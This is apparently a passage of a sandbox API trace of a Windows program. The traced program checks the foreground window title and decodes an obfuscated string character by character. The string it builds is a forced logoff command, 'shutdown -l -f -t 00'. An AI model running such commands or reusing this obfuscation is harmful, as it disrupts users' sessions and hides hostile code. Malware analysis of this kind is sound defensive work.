(bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0179.812] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0179.812] SysStringLen (param_1="Program Manager") returned 0x10 [0179.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Program Manager", cchWideChar=17, lpMultiByteStr=0x11470b4, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Program Manager", lpUsedDefaultChar=0x0) returned 17 [0179.813] SetWindowTextA (hWnd=0x103c4, lpString="Program Manager") returned 1 [0179.813] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0179.813] GetFocus () returned 0x0 [0179.813] lstrlenA (lpString="Program Manager") returned 15 [0179.813] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11470b4) returned 0x1 [0179.814] IsWindow (hWnd=0x103c4) returned 1 [0179.814] IsWindow (hWnd=0x103c4) returned 1 [0179.814] IsWindow (hWnd=0x103c4) returned 1 [0179.814] IsWindow (hWnd=0x103c4) returned 1 [0179.815] GetFocus () returned 0x0 [0179.815] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0179.815] GetFocus () returned 0x0 [0179.815] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x10) returned 0x10e1d20 [0179.815] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x10, lParam=0x10e1d20) returned 0xf [0179.815] GetFocus () returned 0x0 [0179.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0179.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x11470b4, cchWideChar=16 | out: lpWideCharStr="Program Manager") returned 16 [0179.816] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10e1d20 | out: hHeap=0x10d0000) returned 1 [0179.816] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0179.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.818] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0179.818] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.819] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0179.819] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.820] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0179.820] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.869] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0179.870] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.870] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0179.870] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.872] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.872] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.872] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0179.873] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.873] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0179.873] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.874] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.874] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.875] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0179.875] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.876] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0179.876] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.877] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0179.877] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.878] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0179.878] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.878] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.879] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.879] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.880] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.880] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0179.880] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.881] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.881] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.882] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.882] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.883] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0179.883] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.886] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.886] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.887] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.887] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.888] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.888] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.889] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.889] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.890] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.890] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.891] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.891] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.891] GetForegroundWindow () returned 0x20086 [0179.891] GetLastError () returned 0x0 [0179.891] SysStringLen (param_1=" ") returned 0xff [0179.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0179.892] SysStringLen (param_1=" ") returned 0xff [0179.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0179.892] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0179.892] GetLastError () returned 0x0 [0179.892] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0179.892] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0179.893] SysStringLen (param_1="Progr") returned 0x5 [0179.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Progr", cchWideChar=6, lpMultiByteStr=0x116854c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Progr", lpUsedDefaultChar=0x0) returned 6 [0179.893] SetWindowTextA (hWnd=0x103c4, lpString="Progr") returned 1 [0179.893] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0179.894] GetFocus () returned 0x0 [0179.894] lstrlenA (lpString="Progr") returned 5 [0179.894] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116854c) returned 0x1 [0179.894] IsWindow (hWnd=0x103c4) returned 1 [0179.894] IsWindow (hWnd=0x103c4) returned 1 [0179.895] IsWindow (hWnd=0x103c4) returned 1 [0179.895] IsWindow (hWnd=0x103c4) returned 1 [0179.895] GetFocus () returned 0x0 [0179.896] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0179.896] GetFocus () returned 0x0 [0179.896] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x6) returned 0x10ebcd0 [0179.896] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x6, lParam=0x10ebcd0) returned 0x5 [0179.896] GetFocus () returned 0x0 [0179.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Progr", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0179.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Progr", cbMultiByte=-1, lpWideCharStr=0x116854c, cchWideChar=6 | out: lpWideCharStr="Progr") returned 6 [0179.896] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0179.896] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0179.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.898] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0179.898] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.899] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0179.902] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.902] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", 